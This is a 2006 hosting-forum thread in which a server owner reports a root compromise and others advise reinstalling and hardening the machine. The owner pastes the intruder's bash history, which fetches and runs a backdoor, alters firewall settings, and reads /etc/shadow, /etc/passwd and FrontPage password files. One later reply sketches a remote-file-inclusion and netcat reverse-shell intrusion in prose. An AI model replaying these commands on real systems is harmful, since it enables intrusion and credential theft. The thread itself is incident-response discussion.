Results 1 to 19 of 19
  1. #1

    my server hacked please help me

    Hello

    today my server is hacked when I see top command at the morning I see some one enter and get e-mail from root

    and I see that the one who enter is root

    then he changed the root password

    I send to DC to reset root password and they did

    and I see the hacker create a new user and enter with this user

    But I see that he did this command

    passwd root

    with this user and he changed the root password again

    and he can stop the network and start to delete backup then I send to DC to unplug this server

    Now My server online again But the hacker can enter and did that again

    I have a lot of security in this box like

    APF - BFD - Modsec - chmod 000 compiler -- everything is updated ( php 4.4.4. - mysql - apache ) ...etc

    My kernel is 2.6.17.5-HN-2.3-P4

    so what I must do ???

    please help

  2. #2
    Join Date
    Jun 2003
    Location
    Janesville, Wi
    Posts
    1,516
    Reinstall the OS. You've been compromised with no way of possibly knowing how deep it went. Then make sure that you take the security measures necessary to prevent this in the future. Aka:

    Use the latest OpenSSL, the lates OpenSSH. Do not use the RPM releases as they are old.

    Use hard passwords.

    Do a WHT search for server hardening for more details.
    Jakiao

  3. #3
    the hacker enter again now and I unplug the server again

    he enter with user But I need to know how he can do root prevelege ???

    his bach.history is

    cat /etc/passwd
    ls /var/named
    top
    ps
    bg
    cd /etc/init.d
    wget <<removed url>>
    chmod 777 dc
    ./dc
    ps
    apf
    apf -f
    cd /etc/apf
    ls
    pico conf.apf
    apf -s
    apf -r
    uname -a
    ls /var/named
    cd
    cd /home
    ls
    cd /
    ls
    cd backup
    ls
    cd ..
    ls
    cd home
    ls
    cd sprestore
    ls
    cd cprestore
    ls
    ls -all
    ls /var/named
    pico /home/*/public_html/_vti_pvt/service.pwd
    cat /home/*/public_html/_vti_pvt/service.pwd
    cat /home/*/public_html/_vti_pvt/access.cnf
    d
    cd ..
    ls


    cp -r /etc/shadow shadow.txt
    ls
    rm shadow.txt

    cp -r /etc/shadow shadow.txt
    chmod 755 shadow.txt
    rm shadow.txt
    history
    d
    ls /var/named
    w
    cd /home
    d
    cd hmel
    ls
    cd public_html/
    d
    cd uploads
    d
    Last edited by sirius; 10-02-2006 at 03:55 PM.

  4. #4
    Join Date
    Jun 2003
    Location
    Janesville, Wi
    Posts
    1,516
    Obviously you had software which was exploitable (example: OpenSSH wasn't updated to the lastest version and the hacker gained entry that way).

    Look, your system has been compromised. You need to reinstall the OS.

    Seriously, tho, read up on server hardening. There are several topics about it here on WHT.
    Jakiao

  5. #5
    bUT DO YOU KNOW ANYTHING ABOUT THIS

    <<removed url>>

    ???
    can he get root withthis expoit ??
    Last edited by sirius; 10-02-2006 at 03:54 PM.

  6. #6
    Join Date
    Jun 2003
    Location
    Janesville, Wi
    Posts
    1,516
    He didn't need the root password. He was already logged in.

    The file he downloaded was a backdoor program. Aka: Even if you upgrade your software and change your root pass, with that installed he can always gain entry.

    Look, your system is screwed. You need to start from scratch.
    Jakiao

  7. #7
    Yup Jakiao was right you are hosed unplugged, reformat and reinstall.

    But thanks for putting up his bash.history for us. It's kinda interesting... I went to his site:

    <<removed url>>

    I can read hebrew but arabic is not my expertise. Can anyone who knows more arabic than I explain how illegal exactly that site is?
    Last edited by sirius; 10-02-2006 at 03:54 PM.
    Gavin Rogers, full time problem solver.

  8. #8
    Join Date
    Jun 2006
    Posts
    31
    Quote Originally Posted by gavin8or
    Yup Jakiao was right you are hosed unplugged, reformat and reinstall.

    But thanks for putting up his bash.history for us. It's kinda interesting... I went to his site:

    <<removed url>>

    I can read hebrew but arabic is not my expertise. Can anyone who knows more arabic than I explain how illegal exactly that site is?
    It is a web site that provides shared hosting services for hackers only! Hah!
    Last edited by sirius; 10-02-2006 at 03:54 PM.

  9. #9
    Join Date
    Jan 2005
    Location
    Scotland, UK
    Posts
    2,549
    Since you have been rooted you will need to reload.

    The dc file above is just a backdoor that listens on port 22992, since it's running as root that's how access is being gained again.

    You can see that with

    netstat -npl | grep 22992

    -Scott
    Server Management - AdminGeekZ.com
    Infrastructure Management, Web Application Performance, mySQL DBA. System Automation.
    WordPress/Magento Performance, Apache to Nginx Conversion, Varnish Implimentation, DDoS Protection, Custom Nginx Modules
    Check our wordpress varnish plugin. Contact us for quote: [email protected]

  10. #10
    Join Date
    Jun 2003
    Location
    Janesville, Wi
    Posts
    1,516
    Also, I wouldn't be surprised if a keylogger has been setup on the server via the SSHD binary. If one has, every single thing you type (passwords included) will be logged and send to the hacker.

    After you reinstall the OS, be sure to use entirely new passwords. Make sure they're complicated too.
    Jakiao

  11. #11
    Join Date
    May 2002
    Location
    Kingston, Ontario
    Posts
    1,573
    You need to determine how they managed to get root before simply reloading the OS. It's time to hire a professional admin instead of asking for help on the forums.Determine the source of entry and other issues then fix the hole for the next OS reload
    Upload Guardian 2 - Malicious Upload Scanner - Windows and Linux!
    Instantly scan uploaded files
    Get notified when released

  12. #12
    Join Date
    Jun 2003
    Location
    Janesville, Wi
    Posts
    1,516
    I'm willing to bet money the guy came in through an exploitable OpenSSH. If he's using one of the many common operating systems (excluding Fedora), then his up2date repository uses OpenSSH 3.9 or 3.6. There are some very nasty exploits in those which would allow root entry without the password.
    Jakiao

  13. #13
    Join Date
    Sep 2006
    Posts
    53
    guys anybody caught the removed url which was here !! ??
    i need it

  14. #14
    Join Date
    Apr 2002
    Location
    Las Vegas
    Posts
    797
    if you need 911 help and total fix .... i would use totalserversolutions.com

    far as i know, they can fix it all at any time

  15. #15
    Join Date
    Aug 2006
    Location
    Florida
    Posts
    10
    YEah LinuxLover, its time to Nuke and Pave

    This hacker has set up shop on your box. is it a shared box or dedicated?

    In either case you need to lock down your security. Hire a professional or do some scans to find holes. There are Open source scans you can use or third party SAAS that can monitor your server for vulnerabilities. These can do continual interval scans that can keep you aprised of any new holes.

    But Jakiao is right. This dude/dudette probably has installed keyloggers and other hidden scripts. There really is no telling how deep he/she is. Reinstalling the OS is the easiest way to go. But first I would find out how they are getting in.

    Again is it shared, dedicated, Co-lo, VPS. How are you hosted?

  16. #16
    Join Date
    Jun 2003
    Location
    Janesville, Wi
    Posts
    1,516
    gotzaway ... why do you need the URL to the code?
    Jakiao

  17. #17
    Join Date
    Sep 2006
    Posts
    53
    i think the url back to the hacker
    isnt that ?

  18. #18
    Join Date
    Aug 2003
    Location
    wilbur ,washington
    Posts
    217
    ouch i think he rooted you with root kits, it might be to late do a os reinstall

  19. #19
    Join Date
    Mar 2006
    Location
    New York USA
    Posts
    402
    Hmmm, perhaps it wasnt a OpenSSH exploit as mentioned. Has anyone thought that perhaps the host could have been running a Vuln PHP based script that allowed Remote File Inclusions, and simply the "Hacker" performed this exploit, included a remote file to run arbitrary code on the hosts server, which would give him/her the same priv's as root, then simply in the code used a wget to request a file from another remote location, downloaded that to the target box, then went ahead and used that file as a backdoor, or perhaps ran netcat to reverse connect back to the attacker, thus causing a "back-door' then whilst in the targetd machine, changed passwords, downloaded and installed other hidden scripts/root kits ect?

    The one thing i can say is that everyone is 110% right on 2 things..

    1. Reformat the box indeed
    2. Hire a professional company to Scan the machine, and look into your preinstalled scripts, such as fantastico deluxe and make sure all of the files are up to date.

    Also make sure your passwords are strong and hard to guess. Perhaps set a password base requirement for all your clients, so they cant be compromised by weak passwords, and have their accounts be used as legit hack accounts.

    Thanks,

    -Shaun

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •